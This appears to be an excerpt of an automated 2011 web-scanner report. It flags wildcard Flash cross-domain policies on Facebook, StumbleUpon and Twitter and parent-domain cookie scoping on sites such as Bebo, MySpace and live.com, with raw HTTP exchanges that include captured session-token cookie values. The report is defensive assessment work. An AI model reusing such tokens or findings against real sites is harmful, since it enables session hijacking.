xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<td><a
id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;">Click to Chat Now</a>
...[SNIP]...
5. Flash cross-domain policy  previous  next
There are 3 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.168.37
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...
5.2. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:02 GMT
Content-Type: application/xml
Content-Length: 460
Date: Wed, 06 Jul 2011 11:15:26 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...
5.3. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:28 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 06 Jul 2011 11:45:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...
6. Cookie scoped to parent domain  previous  next
There are 37 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

6.1. http://www.bebo.com/c/share  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/share HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Location: http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0
Content-Type: text/html; charset=UTF-8
Content-Length: 95
Date: Wed, 06 Jul 2011 11:21:00 GMT
Connection: close
Set-Cookie: bvid=bcfc7676-2f08-4e18-91ba-a0a7a2b05abd|1309951260831; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:00 GMT
Set-Cookie: bdaysession=59cab38c07f11804620907511; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112100; domain=.bebo.com; path=/

The URL has moved <a href="http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0">here</a>
6.2. http://www.diigo.com/post  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diigo.com
Path:   /post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 06 Jul 2011 14:07:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: _smasher_session=a9bd786efe2dc9056666343ce77be031; domain=diigo.com; path=/
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00062
Content-Length: 142
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>
6.3. http://www.myspace.com/Modules/PostTo/Pages/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: b6a926eb7268a3c3750ad2730c953a9795441bd2feec1fa4
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634455240459655487&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Wed, 13-Jul-2011 11:40:45 GMT; path=/
Set-Cookie: SessionDDF2=ErqkO3ydTaOccqIxl60+kHYCyG0t5ioyReAa6cduhLOm8nYvFSCSuhZtTbrUe7jHEB2KQMtn1NeMim1gRF15jw==; domain=.myspace.com; expires=Sun, 06-Jul-2031 11:40:45 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: My Pet Hamster
Date: Wed, 06 Jul 2011 11:40:45 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...
6.4. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
6.5. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
6.6. http://segments.adap.tv/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=lotame&type=gif&audid=2723&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jul+04+18%3A51%3A56+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-30+05%3A43%3A39"; audienceData="{\"v\":2,\"providers\":{\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-07-06+04%3A21%3A53";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"7\":{\"f\":1312527600,\"e\":1312527600,\"s\":[1512],\"a\":[]},\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1949,1966,1947,1960,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
6.7. https://signup.live.com/signup.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.aspx HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1309951256&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Flic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: ipl=c=8SNt4URhbGxhc3xOb3J0aCBBbWVyaWNhfFVuaXRlZCBTdGF0ZXN8dXN8MzIuNzk5OTk5fC05Ni43ODcwMDJ8NzUyMDd8U291dGggQ2VudHJhbHxUZXhhcw&v=2; domain=.live.com; path=/; secure; HttpOnly
Set-Cookie: xidseq=2; domain=.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:40:56 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Wed, 06 Jul 2011 11:20:56 GMT
Connection: close
Content-Length: 331

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1309951256&amp;rver=6.1.6206.0&amp;w
...[SNIP]...
6.8. http://social.zune.net/frag/MediaReviewBlock/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /frag/MediaReviewBlock/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /frag/MediaReviewBlock/ HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857440
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:46 GMT
Content-Length: 4716
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:46 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/

<h2 style=""></h2>
<div id="ajaxErr"></div>
<input type="hidden" id="_comments_hidDelete" /><div class="Pivot"> <a href="#" onclick="ajaxLoader('','&#47;frag&#47;MediaReviewBlock&#47;&#63;_saveRe
...[SNIP]...
6.9. http://social.zune.net/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857422
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:38 GMT
Content-Length: 24089
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:36 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:38 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
6.10. http://social.zune.net/zPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /zPage.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zPage.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S805
X-Powered-By: ASP.NET
Content-Length: 13509
Expires: Wed, 06 Jul 2011 14:06:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:50 GMT
Connection: close
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:49 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
6.11. http://spaces.live.com/BlogIt.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spaces.live.com
Path:   /BlogIt.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BlogIt.aspx HTTP/1.1
Host: spaces.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: ede387e6-6b9a-47e4-9826-4e6371654e4e
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 14:06:46 GMT; path=/
Set-Cookie: sc_lpscache_142=; domain=spaces.live.com; path=/
Set-Cookie: sc_clustbl_142=08660009c693a889; domain=spaces.live.com; expires=Fri, 05-Aug-2011 14:06:46 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC564 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 14:06:45 GMT
Connection: close
Content-Length: 2330


<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=https&#58;//login.live.com/login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1309961206&#38;rver&#61;6.1.620
...[SNIP]...
6.12. http://va.px.invitemedia.com/goog_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=ThRFQQAEG8YK5TlPHdsIpCfKn676XEjdI1IuFw&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1308836704+ 